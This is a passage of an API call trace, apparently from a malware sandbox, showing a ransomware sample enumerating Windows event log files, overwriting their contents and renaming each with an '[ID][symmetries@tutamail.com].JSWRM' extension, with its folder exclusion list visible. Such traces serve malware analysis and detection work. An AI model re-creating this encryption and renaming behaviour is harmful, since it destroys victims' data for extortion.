lpUsedDefaultChar=0x0) returned 56 [0065.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e418, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0065.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.762] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.762] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.762] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.762] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.768] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.768] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.769] CloseHandle (hObject=0x450) returned 1 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0065.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0065.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0065.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.770] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0065.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.771] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0065.771] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2=".") returned 1 [0065.771] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="..") returned 1 [0065.771] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="...") returned 1 [0065.771] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="windows") returned -1 [0065.771] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="recovery") returned -1 [0065.772] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="perflogs") returned -1 [0065.772] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.772] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.772] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="system volume information") returned -1 [0065.772] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpString2="msocache") returned -1 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpUsedDefaultChar=0x0) returned 53 [0065.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpUsedDefaultChar=0x0) returned 53 [0065.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.772] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.772] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.772] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.773] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.782] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.782] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.783] CloseHandle (hObject=0x450) returned 1 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0065.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.785] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.789] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2=".") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="..") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="...") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="windows") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="recovery") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="perflogs") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="system volume information") returned -1 [0065.789] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpString2="msocache") returned -1 [0065.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0065.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0065.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=51, lpMultiByteStr=0x20de78, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0065.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0065.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0065.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=51, lpMultiByteStr=0x20e268, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0065.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0065.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0065.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0065.790] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.790] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.790] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.790] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.797] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.797] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.797] CloseHandle (hObject=0x450) returned 1 [0065.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0065.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0065.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.799] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.799] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2=".") returned 1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="..") returned 1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="...") returned 1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="windows") returned -1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="recovery") returned -1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="perflogs") returned -1 [0065.799] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="documents and settings") returned 1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="system volume information") returned -1 [0065.800] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpString2="msocache") returned -1 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, 